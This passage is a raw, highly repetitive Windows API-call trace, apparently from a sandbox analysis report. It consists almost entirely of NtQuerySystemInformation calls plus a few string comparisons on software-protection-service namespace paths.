ResultLength=0x0) [0239.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0239.370] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0239.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0239.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0239.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0239.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0239.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0239.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0239.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0239.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0239.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0239.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0239.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0239.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0239.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0239.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0239.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0239.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0239.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0239.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0239.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0239.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0239.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0239.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0239.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0239.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0239.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0239.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0239.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f230, Length=0x50, ResultLength=0x0) [0239.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1b0, Length=0x28, ResultLength=0x0) [0239.404] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\2de67392-b7a7-462a-b1ca-108dd189f588", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f230, Length=0x50, ResultLength=0x0) [0239.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f230, Length=0x50, ResultLength=0x0) [0239.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f230, Length=0x50, ResultLength=0x0) [0239.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f160, Length=0x38, ResultLength=0x0) [0239.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef90, Length=0x28, ResultLength=0x0) [0239.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef90, Length=0x28, ResultLength=0x0) [0239.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef90, Length=0x28, ResultLength=0x0) [0239.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f000, Length=0x28, ResultLength=0x0) [0239.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f160, Length=0x38, ResultLength=0x0) [0239.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f080, Length=0x28, ResultLength=0x0) [0239.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f080, Length=0x28, ResultLength=0x0) [0239.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef20, Length=0x20, ResultLength=0x0) [0239.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eea0, Length=0x20, ResultLength=0x0) [0239.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eea0, Length=0x20, ResultLength=0x0) [0239.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eea0, Length=0x20, ResultLength=0x0) [0239.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 